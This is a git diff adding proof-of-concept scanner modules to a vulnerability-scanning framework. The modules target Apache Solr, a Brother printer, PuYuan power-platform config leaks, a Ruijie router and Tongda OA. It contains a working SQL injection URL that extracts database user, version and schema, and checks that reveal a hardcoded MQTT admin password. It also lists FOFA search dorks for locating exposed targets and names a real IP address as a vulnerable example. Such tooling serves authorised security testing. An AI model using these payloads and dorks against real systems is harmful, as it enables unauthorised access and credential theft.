diff --git a/README.md b/README.md index e1a1bbc..6c54ea1 100644 --- a/README.md +++ b/README.md @@ -10,14 +10,14 @@ [![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/blen/blob/main/LICENSE) -[![POC_NUM](https://img.shields.io/badge/poc_num-168-orange.svg)](#PocSupport) +[![POC_NUM](https://img.shields.io/badge/poc_num-174-orange.svg)](#PocSupport) ![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/blen?color=gree) ![GitHub forks](https://img.shields.io/github/forks/openx-org/blen?color=blue) ## 🦌 简介 -1、POC数量、经过OpenxLab实验室小伙伴们的不懈努力现已有168个POC; +1、POC数量、经过OpenxLab实验室小伙伴们的不懈努力现已有174个POC; 2、使用python编写、跨平台、并发能力强、扫描速度非常快; @@ -189,12 +189,14 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |Apache Solr|Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)|``poc/Apache_Solr/CVE_2019_17558/poc.py``| ||Apache Solr 任意文件读取漏洞|``poc/Apache_Solr/File_Read/poc.py``| ||Apache Solr 远程命令执行 Log4j|``poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py``| +||Apache Solr 未授权访问|``poc/Apache_Solr/Unauth_Access/poc.py``| |Alibaba_FastJson|Alibaba_FastJsonRCE_CVE_2017_18349|``poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py``| |AtlassianConfluence 远程代码执行漏洞|AtlassianConfluence_RCE_FileServer_CVE_2022_26134|``poc/AtlassianConfluence/RCE_FileServer_CVE_2022_26134/poc.py``| |MicroSoft|MicroSoftRCE_CVE_2022_2190|``poc/MicroSoftRCE_CVE_2022_21907/poc.py``| |Sangfor 深信服|深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)|``poc/SANGFOR_深信服/RCE_2020_EDR/poc.py``| |碧海威 L7|碧海威 L7 弱口令漏洞|``poc/Bithighway_碧海威/Weak_Pass_L7/poc.py``| |BSPHP|BSPHP 未授权访问 信息泄露漏洞|``poc/BSPHP/Info_Disclosure/poc.py``| +|Brother-MFC|Brother MFC-L2730DW series弱口令漏洞|``poc/Brother MFC-L2730DW/Weak_Pass/poc.py``| |C-Lodop|C-Lodop 云打印机系统平台任意文件读取漏洞|``poc/C_Lodop/File_Read/poc.py``| |中国电信|电信天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞|``poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py``| ||大唐电信AC集中管理平台默认口令|``poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/poc.py``| @@ -286,6 +288,8 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |PHP|php v8.1开发版后门检测|``poc/php/Backdoor_v8dev/poc.py``| |PHPStudy|PHPStudy 后门检测|``poc/PHPStudy/Back_Door/poc.py``| |PHPUnit|PHPUnit eval-stdin.php 远程命令执行漏洞|``poc/PHPUnit/RCE_eval_stdin/poc.py``| +|普元电力|电力运维云平台管理口令泄露漏洞|``poc/PuYuan/Config_info_Disclosure/poc.py``| +|普元电力|电力运维云平台存在数据库配置信息泄露漏洞|``poc/PuYuan/Info_Disclosure/poc.py``| |Redis|Redis未授权访问|``poc/Redis/Unauth_Access/poc.py``| |锐捷|锐捷EG网关 userAuth.php存在任意文件读取漏洞|``poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py``| ||锐捷NBR 1300G 路由器 越权CLI命令执行漏洞|``poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py``| @@ -293,6 +297,7 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||锐捷RG-UAC/RG-ISG统一上网行为管理审计系统存在账号密码信息泄露|``poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/poc.py``| ||锐捷Smartweb管理系统 默认账户➕命令执行漏洞|``poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py``| ||锐捷云课堂主机 目录遍历漏洞|``poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py``| +||锐捷路由器RG-NBR800GW 未授权访问漏洞|``poc/Ruijie_锐捷/Unauth_Access/poc.py``| |若依后台管理系统|若依后台管理系统 弱口令|``poc/RuoYi_若依/Weak_Pass/poc.py``| |Samsung|三星路由器本地文件包含|``poc/Samsung/Lfi_Samsung_Wlan_AP/poc.py``| ||三星 WLAN AP WEA453e路由器 远程命令执行漏洞|``poc/Samsung/RCE_Samsung_WLANAP_WEA453e/poc.py``| diff --git a/blen_settings.json b/blen_settings.json new file mode 100644 index 0000000..ba72468 --- /dev/null +++ b/blen_settings.json @@ -0,0 +1,8 @@ +{ + "defaultContext": { + "account": null, + "database": null, + "schema": null + }, + "scripts": [] +} \ No newline at end of file diff --git a/poc/Apache_Solr/Unauth_Access/poc.py b/poc/Apache_Solr/Unauth_Access/poc.py new file mode 100644 index 0000000..a74ad3f --- /dev/null +++ b/poc/Apache_Solr/Unauth_Access/poc.py @@ -0,0 +1,72 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + + +class POC(POCBase): + _info = { + "author" : "Du9r1", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-11-2", # POC创建时间 + "UpdateDate" : "2022-11-2", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Solr未授权访问", # 漏洞名称 + "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + + "AppName" : "solr", # 漏洞应用名称 + "AppVersion" : "全版本", # 漏洞应用版本 + "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写能查到的最早的文献日期,格式:xxxx-xx-xx + "VulnDesc" : """ + Solr应用服务器安装后未进行管理界面访问限制,导致管理界面可直接进行访问,泄露敏感信息并可对Solr进行进一步的管理。 + 当开发者配置不当时就可能造成未授权访问漏洞。 + """, # 漏洞简要描述 + + "fofa-dork":'title="solr"&&country="CN"', # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + + } + + timeout = 10 + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/solr/admin/cores" # url自己按需调整 + + headers = {"User-Agent":"Mozilla/5.0 (Windows ME; U;cd en) Opera 8.51", + "Connection":"close"} + + try: + """ + 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False) + if req.status_code == 200 and "responseHeader" in req.text: + vuln = [True,req.text] + else: + vuln = [False,""] + except Exception as e: + raise e + + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/Brother MFC-L2730DW/Weak_Pass/poc.py b/poc/Brother MFC-L2730DW/Weak_Pass/poc.py new file mode 100644 index 0000000..ac5a528 --- /dev/null +++ b/poc/Brother MFC-L2730DW/Weak_Pass/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-09-07", # POC创建时间 + "UpdateDate" : "2022-09-07", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Brother MFC-L2730DW series弱口令漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-0906", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-09-07", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + title="Brother HL-L8360CDW series" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/general/status.html" # url自己按需调整 + data = "CSRFToken=uDmE4RvNEHZfHNtcOruqZPtWbT3IjovV%2B4zyo6cxVUZWt2Loyw%3D%3D&B5be=initpass&loginurl=%2Fgeneral%2Fstatus.html" + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,headers = headers , data= data ,proxies = self.proxy ,timeout = self.timeout,verify = False) + if "Administrator" in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/PuYuan/Config_Info_Disclosure/poc.py b/poc/PuYuan/Config_Info_Disclosure/poc.py new file mode 100644 index 0000000..f3f4837 --- /dev/null +++ b/poc/PuYuan/Config_Info_Disclosure/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "普元电力发展有限公司电力运维云平台管理口令泄露漏洞", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "电力运维云平台管理口令泄露漏洞", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2021-09-02", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + 访问/config/configVue.js文件,发现其存在MQTT的配置信息,其账号密码也是web登录的账号密码。这个账号也是其默认admin的默认账号密码。利用该账号密码可登录多个平台。 + """, # 漏洞简要描述 + + "fofa-dork":""" + icon_hash="-1291691164" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/config/configVue.js" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "MQTT_USERNAME:'admin'" and "MQTT_KEY:'Acrel001'"in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/PuYuan/Info_Disclosure/poc.py b/poc/PuYuan/Info_Disclosure/poc.py new file mode 100644 index 0000000..2b8ef62 --- /dev/null +++ b/poc/PuYuan/Info_Disclosure/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "普元电力发展有限公司电力运维云平台存在数据库配置信息泄露漏洞", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "电力运维云平台存在数据库配置信息泄露漏洞", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2021-09-02", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + 电力运维云平台存在数据库配置信息泄露漏洞,泄露相应的数据库配置信息。 + """, # 漏洞简要描述 + + "fofa-dork":""" + icon_hash="-1291691164" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/fileSystem/jdbc/jdbc.properties" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "jdbc.properties" in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/Ruijie_锐捷/Unauth_Access/poc.py b/poc/Ruijie_锐捷/Unauth_Access/poc.py new file mode 100644 index 0000000..6f96935 --- /dev/null +++ b/poc/Ruijie_锐捷/Unauth_Access/poc.py @@ -0,0 +1,72 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-09-07", # POC创建时间 + "UpdateDate" : "2022-09-07", # POC创建时间 + "PocDesc" : """ + 锐捷路由器(RG-NBR800GW)存在未授权访问漏洞,攻击者可以通过特殊手段获取路由器敏感信息,如内网地址mac等 + """, # POC描述,写更新描述,没有就不写 + + "name" : "锐捷路由器(RG-NBR800GW)存在未授权访问漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-0916", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "RG-NBR800GW", # 漏洞应用版本 + "VulnDate" : "2022-09-16", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + icon_hash="772273815" + """, # fofa搜索语句 + "example" : "http://47.253.113.46:9999/index.data?opt=err&_=1663068005", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/index.data?opt=err&_=1663068005" + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False) + if "{vs:'RG-NBR" in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() diff --git a/poc/Tongda_通达OA/Sql_inj_TongDa/poc.py b/poc/Tongda_通达OA/Sql_inj_TongDa/poc.py index a488f14..3756938 100644 --- a/poc/Tongda_通达OA/Sql_inj_TongDa/poc.py +++ b/poc/Tongda_通达OA/Sql_inj_TongDa/poc.py @@ -2,7 +2,6 @@ import requests from lib.core.common import url_handle,get_random_ua from lib.core.poc import POCBase - # ... import urllib3 urllib3.disable_warnings() @@ -12,29 +11,29 @@ class POC(POCBase): _info = { "author" : "hansi", # POC作者 "version" : "1", # POC版本,默认是1 - "CreateDate" : "2021-06-18", # POC创建时间 - "UpdateDate" : "2021-06-18", # POC创建时间 + "CreateDate" : "2022-09-06", # POC创建时间 + "UpdateDate" : "2022-09-06", # POC创建时间 "PocDesc" : """ - + 略 """, # POC描述,写更新描述,没有就不写 - "name" : "通达OA前台存在sql注入", # 漏洞名称 - "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "name" : "通达OA 11.9,SQL注入漏洞", # 漏洞名称 + "VulnID" : "oFx-2022-0906", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 - "AppVersion" : "无", # 漏洞应用版本 - "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-09-06", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ - 通达OA前台存在sql注入 + """, # 漏洞简要描述 "fofa-dork":""" - app="TDXK-通达OA" + app="TDXK-通达OA" """, # fofa搜索语句 "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 - } + def _verify(self): """ 返回vuln @@ -44,8 +43,8 @@ class POC(POCBase): 不存在漏洞:vuln = [False,""] """ vuln = [False,""] - url = self.target + "/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20whe\re%201={`\=%27`%201}%20un\ion%20(s\elect%20user_name,byname%20fr\om%20user%20whe\re%201\={`=`%201})--%20%27'" # url自己按需调整 - + url = self.target + "/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1,1&tab=5%20where%202={`=%27`%201}%20union%20(select%20CURRENT_USER(),version(),SCHEMA())--%20%27" # url自己按需调整 + headers = {"User-Agent":get_random_ua(), "Connection":"close", @@ -54,21 +53,21 @@ class POC(POCBase): try: """ - 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动 + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ - req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False) - if req.status_code == 200 and "1" in req.text: + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "root@::1;td_oa;5.6.35-log"in req.text:#req.status_code == 200 and : vuln = [True,req.text] else: vuln = [False,req.text] except Exception as e: raise e - + + # 以下逻辑酌情使用 if self._honeypot_check(vuln[1]) == True: vuln[0] = False return vuln - def _attack(self): return self._verify() \ No newline at end of file